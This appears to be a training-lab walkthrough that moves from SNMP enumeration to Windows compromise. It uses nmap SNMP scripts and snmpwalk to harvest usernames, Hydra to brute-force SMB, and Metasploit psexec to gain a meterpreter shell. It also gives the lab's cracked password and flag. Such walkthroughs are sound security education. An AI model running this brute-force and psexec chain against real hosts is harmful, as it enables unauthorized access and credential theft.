SNMP Analysis

In this lab, you will learn to scan the target machine to discover SNMP service and perform information gathering using SNMP nmap scripts and other tools.

Lab Environment

In this lab environment, the user will get access to a Kali GUI instance. An instance of the vulnerable service can be accessed using the tools installed on Kali at http://demo.ine.local

Objective: Exploit the target to gain the shell and find the flag!

Tools

The best tools for this lab are:

Nmap
Metasploit Framework
snmpwalk
Hydra

Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course will dramatically reduce the benefits of a hands-on lab!

Solution

Step 1: Open the lab link to access the Kali GUI instance.

Content Image

Step 2: Check if the machine/domain is reachable.

Command

ping demo.ine.local

Content Image

The machine is reachable.

Step 3: Check open ports on the machine.

Command

nmap demo.ine.local

Content Image

We can notice, multiple ports are open on the target machine.

Step 4: Now, let's check if the SNMP port is open or not

We must keep in mind that nmap does not check for UDP ports by default. As we already know, SNMP runs on the UDP port 161.

Therefore, let's check if this specific is opened.

Command

nmap -sU -p 161 demo.ine.local

Content Image

As we can see, the UDP port 161 is open. This information is crucial for our following tasks.

Note: We will have to double-check nmap results by sending SNMP requests to the host and checking if we get responses from both. Sometimes, when host-based firewalls protect the hosts, they may confuse the nmap scan results.

Step 5: Now, we need to find the SNMP server community string to access the target machine service.

First, we need to discover the community strings to access the SNMP service.

Note: If you are not familiar with SNMP terms like communities, please, take a look at the course material.

We could use nmap snmp-brute script to find the community string. The script uses the snmpcommunities.lst list for brute-forcing it is located inside /usr/share/nmap/nselib/data/snmpcommunities.lst directory.

Command

nmap -sU -p 161 --script=snmp-brute demo.ine.local

Content Image

As we can see, we found three community names: public, private, and secret

Step 6: Now, let's run the snmpwalk tool to find all the information via SNMP.

snmpwalk

snmpwalk is an SNMP application that uses SNMP GETNEXT requests to query a network entity for a tree of information. An object identifier (OID) may be given on the command line. This OID specifies which portion of the object identifier space will be searched using GETNEXT requests. All variables in the subtree below the given OID are queried and their values presented to the user. Each variable name is given in the format specified in variables. If no OID argument is present, snmpwalk will search the subtree rooted at SNMPv2-SMI::mib-2 (including any MIB object values from other MIB modules, that are defined as lying within this subtree). If the network entity has an error processing the request packet, an error packet will be returned and a message will be shown, helping to pinpoint why the request was malformed. If the tree search causes attempts to search beyond the end of the MIB, the message "End of MIB" will be displayed. Source https://linux.die.net/man/1/snmpwalk

We are running the snmpwalk command on the target machine.

Command

snmpwalk -v 1 -c public demo.ine.local

-v: Specifies SNMP version to use

-c: Set the community string

Content Image

We were able to gather a lot of information via SNMP. But, this isn't in a proper readable format. We need to take the help of other tools, i.e., nmap SNMP scripts, for specific information.

Step 7: Let's run all the SNMP nmap scripts to gather all possible information via the SNMP service.

Command

nmap -sU -p 161 --script snmp-* demo.ine.local > snmp_output

The above command would run all the nmap SNMP scripts on the target machine and store its output to thesnmp_outputfile. Content Image

This nmap script scan would take some time. Please wait patiently.

From the list of information retrieved, we found a couple of engaging data, such as running processes, users, services, installed applications, etc.

However, analyzing the results, one absorbing information we could extract is the list of Windows users:

Content Image

Step 8: Now, let's run a brute-force attack using these windows users on SMB service.

Remember, port 445 is open, and we can run a brute-force attack using the hydra tool.

First, let's save two usernames in a file. i.e administrator and admin

Content Image

Command

hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb

The hydra switches are described in the help: hydra -help. However, the most relevant parts of the command are explained below:

-L users.txt
This is the dictionary file containing a list of users.
-P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
This tells hydra to use a dictionary file containing a list of known passwords. This particular file (unix_passwords.txt) belongs to "Metasploit Framework"
demo.ine.local
The target
SMB
This is the protocol that should be used by hydra to perform the brute-force attack.

After a couple of minutes, we should see the following results:

Content Image

Thus, hydra successfully found a valid password for administrator and admin users.

Step 9: Now, we will run the psexec Metasploit exploit module to gain the meterpreter session using these credentials.

Let's try to get a shell on this system using the PSExec module of the Metasploit framework.

PSExec (Microsoft Windows Authenticated User Code Execution)

This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description. Source: https://www.rapid7.com/db/modules/exploit/windows/smb/psexec/

Commands

msfconsole -q
use exploit/windows/smb/psexec
show options

Content Image

As we can see, we have to set RHOSTS SMBUSER and SMBPASS. Rest all other essential values, i.e. PAYLOAD, and LHOST, is already set.

Let's set all these values and exploit the target.

Commands

set RHOSTS demo.ine.local
set SMBUSER administrator
set SMBPASS elizabeth
exploit

Note: If you don't gain a meterpreter session for some reason, please re-exploit the target.

Content Image

We have successfully gained the meterpreter session on the target machine.

Step 10: Now, let's read the flag.

Commands

shell
cd C:\
dir
type FLAG1.txt

Content Image

FLAG: a8f5f167f44f4964e6c998dee827110c

We have found the flag!

We have successfully exploited the target machine by extracting information via the SNMP service.

PreviousNetBIOS Hacking NextLinux Exploitation: Lab 1 - Remote Enumeration

Last updated 10 months ago